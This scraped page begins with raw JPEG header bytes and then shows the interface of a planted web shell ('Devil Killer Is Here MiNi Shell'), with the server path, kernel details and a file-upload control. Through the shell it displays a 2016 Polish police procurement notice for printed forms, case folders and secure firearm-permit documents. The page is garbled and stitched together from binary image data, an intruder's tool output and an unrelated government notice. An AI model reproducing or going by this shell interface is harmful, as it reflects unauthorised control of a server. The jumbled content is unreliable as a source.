JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160413/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160413/39609-N-2016.html

<p class="kh_header"><b>Radom: Zakup i dostawa druków, formularzy resortowych, tarcz i obwolut oraz druków ścisłego zarachowania dla KWP zs. w  Radomiu i jednostek podległych - nr postępowania 19/16</b><br>
<b>Numer ogłoszenia: 39609 - 2016; data zamieszczenia: 13.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji z siedzibą w Radomiu , ul. 11 Listopada 37/59, 26-600 Radom, woj. mazowieckie, tel. 48 3453103, faks 48 3452002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.mazowiecka.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa druków, formularzy resortowych, tarcz i obwolut oraz druków ścisłego zarachowania dla KWP zs. w  Radomiu i jednostek podległych - nr postępowania 19/16.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa druków, formularzy resortowych, tarcz i obwolut oraz druków ścisłego zarachowania dla KWP 
zs. w  Radomiu i jednostek podległych w podziale na poszczególne zadania:
Zadanie nr 1 - druki resortowe, formularze, tarcze i obwoluty.
Zadanie nr 2 - druki ścisłego zarachowania.
Opis  techniczny - druki resortowe, formularze, tarcze i obwoluty dot. zadania nr 1
1.Opis techniczny postaci wydawniczej książek i zeszytów wykonanych na papierze offsetowym:Książki różnego formatu w oprawie twardej, równo ciętej, półpłóciennej szyte nićmi lub drutem w grzbiecie oraz klejone klejem introligatorskim. Okładka wykonana z tektury introligatorskiej o gramaturze 800-900g m2 lub z tektury klasy Alaska o gramaturze 450 550 g m2(i jej sztywności), oklejona marmurkiem w kolorze ciemnym lub z kolorowym nadrukiem (jeden kolor); wyklejka niezadrukowana; grzbiet prosty, laminowany płótnem introligatorskim, środki wydrukowane w kolorze czarnym (1+1), na papierze offsetowym o gramaturze 80 g m2. Tytuł książki na naklejce formatu A-6 na pierwszej stronie okładki.  W pozycjach, które dotyczą książek podana jest ilość kartek.
2.Opis techniczny postaci wydawniczej bloczków wykonanych na papierze offsetowym:Bloczki zadrukowane jednostronnie lub dwustronnie (zgodnie ze wzorem druku) drukiem koloru czarnego, kartki wykonane z papieru offsetowego wyłącznie w kolorze białym gramatury 80 g m2, klejone klejem introligatorskim po krótszym lub dłuższym boku, posiadające usztywnienie od spodu z kartonu 200-230 g m2 i przekładkę z kartonu 200-300 g m2. Bloczek składa się odpowiednio z 50 lub 100 kart. 
3.Opis techniczny postaci wydawniczej bloczków wykonanych na papierze samokopiującym formatu: A4, A5, A6: Bloczki zadrukowane jednostronnie drukiem koloru czarnego, kartki wykonane z papieru samokopiującego CFB w różnych kolorach (oryginał + kopie) gramatury 50-60 gm2, klejone klejem introligatorskim po krótszym boku, posiadające usztywnienie od spodu z kartonu 200 -230 g/m2. Bloczek składa się odpowiednio z 50 kart lub 100 kart. 
4.Opis techniczny: Notatnik służbowy  Mp-11, Książka formatu 100 x 130 mm szyta nićmi oraz klejona klejem introligatorskim, zawierająca 64 kartki, oprawa broszurowa, okładka bez nadruku wykonana z kartonu  białego, gładkiego, gramatury 220 -250gm2, bigowanie na grzbiecie cztery razy,środki wykonane z papieru offsetowego gramatury 80g/m2, zadrukowane dwustronnie identycznymi tabelami rozwartymi, paginacja stron, pokrycie farbą ok. 4%.
5.Opis techniczny: Pocztowa Książka Nadawcza Kn-8s
W formacie 2-3 A-4, zeszyt 50 kart, zadrukowany jednostronnie drukiem koloru czarnego, kartki wykonane z papieru samokopiującego CFB wyłącznie w kolorze białym gramatury 50-60 gm2, klejone klejem introligatorskim po krótszym boku, posiadające usztywnienie od spodu z kartonu 200-230 gm2. Bloczek składa się odpowiednio z 50 kart lub 100 kart.
6.Opis techniczny: Go-1, Go-1a, Go-2, Go-2a Bloczki formatu A-4 lub A-5, zadrukowany dwustronnie drukiem koloru  czarnego, 100 kart, kartki wykonane z papieru PELUR o gramaturze 60gm2,  klejone klejem  introligatorskim, posiadające usztywnienie z kartonu 200-230  gm2.
7.Opis techniczny: Akta dochodzenia- śledztwa Ms-49Teczka formatu 32cm x 63cm wykonana z kartonu kremowego jednostronnie  gładzonego, gramatury 250gm2. Grzbiet teczki dziurkowany dwukrotnie po dwa  otwory. Teczka posiada 11 bigów. Do każdej teczki oddzielnie tj. bez wpinania w otwory,  dołożyć należy po jednym komplecie metalowych blaszek i wąsów (do wpinania dokumentów). Druk  dwustronny koloru czarnego, pokrycie farbą ok. 2%. Grzbiet teczkizadrukowany paskiem w kolorze czarnym, szerokości 6 cm.
8.Opis techniczny do: Makiety do materiałów poglądowych z dokonanych czynności (Mek-3): teczka., 84cm x 30cm, gramatura w gm2 -250, druk dwustronny, karton kredowany, bigowanie. Makiety do materiałów poglądowych ekspertyz kryminalistycznych (Mek-4): teczka., 43cm x 30cm, gramatura w gm2 -250, druk dwustronny, karton kredowany, bigowanie. Dokumentacja fotograficzna (Mek-15): teczka., 42cm x 30cm, gramatura w g/m2 -250, druk dwustronny, karton kredowany, bigowanie. Materiał poglądowy(Mek-16): teczka., 42cm x 30cm, gramatura w gm2 -250, druk    dwustronny, karton kredowany, bigowanie
9.Opis techniczny: Teczka poszukiwania/identyfikacji   Pkr-22 Teczka formatu 32cm x 62cm wykonana z kartonu kremowego, jednostronnie gładzonego, gramatury 250gm2. Druk dwustronny koloru czarnego. Grzbiet teczki dziurkowany dwukrotnie po dwa otwory. Na skrzydełku teczka posiada 3 bigi. Do każdej teczki oddzielnie tj. bez wpinania w otwory, dołożyć  należy po jednym komplecie blaszek i wąsów (do wpinania dokumentów).
10.	Opis techniczny: Teczka rejonu  dzielnicowego (kolor niebieski)  MP - 8 Okładka wykonana z tektury 2mm. Pierwsza i czwarta strona okładki oklejona kartonem jednostronnie kredowym w kolorze niebieskim o gramaturze 120gm2, pokryta lakierem UV. Wszystkie rogi okładki (pierwsza i czwarta strona) zabezpieczone płótnem  kanafas w kolorze granatowym wpuszczonym pod okleinę, o wymiarach 3,5cm x 3,5cm. Na trzeciej stronie okładki umieszczono pod okleiną w układzie pionowym stosowne skrzydełka o wymiarach 14,5cm x 15,5cm, bigowanie co 1 cm umożliwiające wpięcie dokumentów zamykanych na tasiemki. Połączenie przednieji tylnej okładki z grzbietem wzmocnione jest dwoma nitami (u góry i u dołu). Teczka zamykana na tasiemki w połowie prawego dłuższego boku.Przegródki (6 sztuk) o formacie 21,5cm x 32cm wykonane są z kartonu w kolorze białym o gramaturze220gm2, zadrukowane jednostronnie tekstem czarnym,  trwale połączone z grzbietem teczki (poza pierwszą przegródką wszystkie pozostałe pokryte są jednostronnie lakierem UV). Grzbiety okładki wykonane z płótna (kanafas w kolorze granatowym) przyklejone do przegródek od strony zewnętrznej. Grzbiet tworzy harmonijkę dostosowująca się do objętości teczki.
Skrzydełka (7 szt.) wykonane z tego samego kartonu, co i same przegródki, posiadają dwie dziurki do wkładania blaszek i wąsów, położone 1cm od lewej krawędzi umożliwiającej wpięcie dokumentów:
a)pierwsze skrzydełko umieszczone jest przed pierwszą stroną rozdziałową,
b)drugie skrzydełko tworzy objętość pierwszego rozdziału (1cm),
c)trzecie skrzydełko tworzy objętość drugiego rozdziału (1cm),
d)czwarte skrzydełko tworzy objętość trzeciego rozdziału (1cm),
e)piąte skrzydełko tworzy objętość czwartego rozdziału (1cm),
f)szóste skrzydełko tworzy objętość piątego rozdziału (1cm),
g)siódme skrzydełko tworzy objętość szóstego rozdziału (1cm),
Format teczki - 23cm x 33cm.
11.Opis techniczny: Akta osobowe kolor zielony Ke-10 Format teczki - 22cm x 31cm 6 kpl. blaszek i wąsów stanowi komplet do wpinania dokumentów.Okładka wykonana z tektury, pierwsza i czwarta strona okładki oklejona jest papierem jednostronnie kredowym w kolorze zielonym o gramaturze 120g/m2, pokrytym lakierem UV, wszystkie rogi zewnętrzne okładki (pierwsza i czwarta strona) zabezpieczone płótnem KANAFAS w kolorze zielonym, wpuszczone w okleinę o wymiarach 3,5cm x 3,5cm. Pierwsza i druga strona okładki zadrukowane drukiem w kolorze czarnym. Połączenie przedniej i tylnej okładki z grzbietem wzmocnione dwoma nitami (u góry i u dołu), Przegródki (3szt.) o wymiarach 22cmx33cm wykonane z kartonu koloru białego o gramaturze 220g/m2, zadrukowane dwustronnie tekstem koloru czarnego, trwale połączone z grzbietem teczki. Grzbiet okładki wykonany z płótna KANAFAS w kolorze zielonym przyklejony do przegródek od strony zewnętrznej, grzbiet tworzy harmonijkę dostosowującą się do objętości teczki. Skrzydełka (trzy sztuki) wykonane 
z tego samego kartonu co przegródki (zagięte w podwójny karton w skrzydełku) posiadają 4 dziurki rozmieszczone stosownie do układu blaszek i wąsów, położone 1cm od krawędzi umożliwiając wpięcie dokumentów, a)pierwsze skrzydełko umieszczone jest bezpośrednio za pierwszą przegródką i tworzy objętość pierwszego  rozdziału (1cm)
b)drugie skrzydełko umieszczone jest bezpośrednio za drugą przegródką i tworzy objętość drugiego rozdziału (1cm) c)trzecie skrzydełko umieszczone jest bezpośrednio za trzecią przegródką i tworzy objętość trzeciego rozdziału (1cm) 12.Opis techniczny:Akta postępowania sprawdzającego kolor niebieski  Ke-80a
Akta postępowania sprawdzającego kolor czerwony Ke-80c 
Akta postępowania sprawdzającego kolor pomarańczowy Ke-80d
Okładka wykonana jest z tektury 2mm. Pierwsza i czwarta strona okładki oklejona kartonem, jednostronnie kredowanym w stosownym do rodzaju teczki kolorze (niebieski, czerwony, pomarańczy) o gramaturze 120gm2, pokryte lakierem UV.  Wszystkie rogi okładki (pierwsza
 i czwarta strona) zabezpieczone płótnem KANAFAS w kolorze czarnym, wpuszczonym pod okleinę o wymiarach 3,5 x 3,5cm. Pierwsza strona okładki zadrukowana tytułem w kolorze czarnym oraz z umieszczoną centralnie w dolnej części strony poziomą, samoprzylepną kieszonką plastikową wraz z wkładką do opisu teczki stanowiącą prostokąt o wymiarach 10,5 x 3,5cm. Połączenie przedniej i tylnej okładki z grzbietem wzmocnione jest dwoma nitami 
(u góry i u dołu). Teczka zamykana na stosowną gumkę po prawym dłuższym boku. Mocowanie gumki do tylnej okładki musi umożliwić jej łatwą wymianę w razie zerwania.
Przegródki (2szt.) o formacie 22 x 32cm, wykonane są z kartonu w kolorze białym
o gramaturze 220g/m2, zadrukowane dwustronnie tekstem czarnym, trwale połączone 
z grzbietem teczki. Grzbiet okładki wykonany z płótna KANAFAS w kolorze czarnym przyklejony do przegródek od strony zewnętrznej. Grzbiet tworzy harmonijkę dostosowującą się do objętości teczki. Skrzydełka (6 sztuk) wykonane z tego samego kartonu co i same przegródki, posiadają dwie dziurki do wkładania blaszek i wąsów, położone 1cm od lewej krawędzi umożliwiające wpięcie dokumentów: pierwsze skrzydełko umieszczone jest przed pierwszą stroną rozdziałową,drugie skrzydełko tworzy objętość pierwszego rozdziału 2cm,trzecie skrzydełko umieszczone jest bezpośrednio za drugim skrzydełkiem,czwarte skrzydełko umieszczone jest bezpośrednio za trzecim skrzydełkiem, piąte skrzydełko tworzy objętość środkowego rozdziału 4cm,szóste skrzydełko tworzy objętość ostatniego rozdziału 1cm.  Format teczki - 23 x 33cm.Do każdej teczki mają być wpięte w stosowne miejsca: trzy kartki luzem w formacie 22 x 32cm, wykonane z kartonu w kolorze białym  o gramaturze 140-160gm2, zadrukowane dwustronnie tekstem czarnym posiadające dwie dziurki do wkładania blaszek i wąsów położone 1cm od lewej krawędzi, umożliwiające jej wpięcie do teczki.jedna kartka luzem wykonana z tego samego kartonu co przegródki i w tym samym  formacie , zadrukowana jednostronnie tekstem czarnym, posiadające dwie dziurki do wkładania blaszek i wąsów położone 1cm od lewej krawędzi, umożliwiające jej wpięcie do teczki. blaszki i wąsy 6 sztuk stanowią komplet do wpinania dokumentów.
13.Opis techniczny: Akta osobowe pracownika Policji Teczka, format B4, o gramaturze 250g/m2, karton kredowany, bigowanie14.Opis techniczny do teczek  Teczka, format 32cm x 50cm (w tym grzbiet teczki - szerokość 6cm), wykonana z kartonu kremowego, jednostronnie gładzonego, o gramaturze 250g/m2, grzbiet teczki dziurkowany dwukrotnie po 2 otwory, bigowanie. Do każdej teczki oddzielnie tj. bez wpinania w otwory, należy dołożyć po jednym komplecie metalowych blaszek i  wąsów. Druk jednostronny, koloru czarnego.
15.Opis techniczny do rejestrów Książka, format A4, 100 kart, oprawa twarda równo ciętej, szytej nićmi lub drutem w grzbiecie oraz klejona klejem introligatorskim, okładka wykonana z tektury introligatorskiej o gramaturze 800-900g/m2 lub z tektury klasy Alaska o gramaturze  450-550g/m2 (i jej sztywności), oklejona marmurkiem w kolorze ciemnym lub z kolorowym nadrukiem (jeden kolor), wyklejka niezadrukowana, grzbiet prosty, laminowany płótnem introligatorskim, środki wydrukowane w kolorze czarnym na papierze offsetowym o gramaturze 80g/m2. Tytuł książki na pierwszej stronie okładki na naklejce formatu A6. 16.Opis techniczny do teczek okolicznościowych Wykonanie w formacie 216mm x 305mm z bigowaniem, w kolorze ciemny granat ze szlachetnego i ozdobnego kartonu fakturowanego w linie poziome o gramaturze 300g/m2. teczka zawiera na stronie zewnętrznej wytłoczonego orła (w polu około 40mm x 42mm) oraz srebrny tekst wykonany metodą nadruku offsetowego (w polu około 160mm x 21mm) - napis w dwóch różnych wersjach. Wewnątrz posiada zakładkę sztancowaną, doklejaną, podtrzymującą dokumenty.Opis techniczny  druków ścisłego zarachowania dot. zadanie nr 2 Nakaz przeszukania/zatrzymania rzeczy Ms-16 wykonany na papierze ofsetowym: bloczek zawierający 100 kartek formatu A5  zadrukowany jednostronnie drukiem koloru czarnego, pokrycie farbą około 5%. Papier biały gramatury 80g/m2. Każda kartka posiada podwójną, dwuliterową serię i sześciocyfrową numerację oraz mikrodruk. Bloczek szyty drutem na dwie klamry, posiadający perforację każdej kartki w 1-3 jej długości. Legitymacja posiadacza broni    Ob-10. książeczka formatu A7, wkład szyty nićmi białymi świecącymi w UV na niebiesko, połączony z okładką poprzez wyklejkę,
wkład 4 kartkowy, papier 90 g/m2 ze znakiem wodnym bieżącym, z zabezpieczeniem chemicznym,wyklejka: papier offsetowy 120 g/m2,okładka: usztywniona tworzywem sztucznym w kolorze czerwonym, tekst na okładce tłoczony czarną folią,kolorystyka: wkład 2 + 2, wyklejka 2 + 0, tekst czarny, tło giloszowe niebieskie,zabezpieczenia: gęste tło giloszowe, mikrodruk oraz seria i 7 - cyfrowa numeracja wykonana farbą czarną świecącą w UV na zielono, Zaświadczenie uprawniające do nabycia broni Ob-11 w postaci kartek luzem
format A5,papier offsetowy biały 80 g/m2,kolorystyka: 2 + 0 (tekst czarny, tło giloszowe niebieskie),gilosz niebieski w formie wyrazów POLICJA, drukowany wzdłuż krótszego boku (dół strony). Karta rejestracyjna broni     Ob-16 książeczka formatu A7, wkład szyty nićmi białymi świecącymi w UV na niebiesko, połączony z okładką poprzez wyklejkę,
wkład 4 kartkowy, papier 90 gm2 ze znakiem wodnym bieżącym, z zabezpieczeniem chemicznym,wyklejka: papier offsetowy 120 g/m2,okładka: usztywniona tworzywem sztucznym w kolorze żółtym, tekst na okładce tłoczony czarną folią,kolorystyka: wkład 2 + 2, wyklejka 2 + 0, tekst czarny, tło giloszowe niebieskie,zabezpieczenia: gęste tło giloszowe, mikrodruk oraz seria i 7 - cyfrowa numeracja wykonana farbą czarną świecącą w UV na zielono,Europejska karta broni palnej Ob-17wymiar karty 420 mm x 148 mm, blankiet bigowany trzy razy w tzw. Z, po złożeniu format A6,papier ze znakiem wodnym, bieżącym, gramatury maksymalnie 120 g/m2, druk dwustronny 4+2,zabezpieczenia: gęste tło giloszowe, mikrodruk, sześciocyfrowy numer na pierwszej stronie,wzór druku określony w rozporządzeniu MSWiA z dnia 12 września 2011 r. (Dz. U. nr 206, poz. 1222). Mrd-4  Pokwitowanie bloczek na papierze samokopiującym formatu A6, zawierający 50 kartek (25 kompletów). Kartki wykonane z papieru samokopiującego (oryginał biały, kopia żółta). Druk dwustronny koloru czarnego. Bloczek szyty drutem na dwie klamry, posiadający perforację każdej kartki umieszczoną po krótszym boku 1 cm od krawędzi. Bloczek zabezpieczony na wierzchu i pod spodem przekładkami koloru białego, równo ciętymi, wykonanymi z kartonu gramatury 200 g/m2 z jednym bigiem na wierzchu. Każda kartka posiada dwuliterową serię i sześciocyfrową numerację oraz mikrodruk.Mrd - 22  Zezwolenie 
bloczek A5 zawierający 50 kartek to jest 25 kompletów (oryginał biały, kopia żółta) klejony klejem introligatorskim po krótszym boku. Kartki wykonane z papieru samokopiującego gramatury 50 - 60 gm2, zadrukowane jednostronnie drukiem koloru czarnego. Zabezpieczony na wierzchu i pod spodem przekładkami koloru białego, równo ciętymi, wykonanymi z kartonu gramatury 200 gm2. 

Termin realizacji  zamówienia : od dnia 22.10.2016 r.  do dnia 22.10.2018 r..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.10.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku. Do oferty należy dołączyć oświadczenie o spełnianiu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku. Do oferty należy dołączyć oświadczenie o spełnianiu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku. Do oferty należy dołączyć oświadczenie o spełnianiu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku. Do oferty należy dołączyć oświadczenie o spełnianiu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku. Do oferty należy dołączyć oświadczenie o spełnianiu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dysponowania niezbędnych zasobów na potrzeby wykonania zamówienia. 
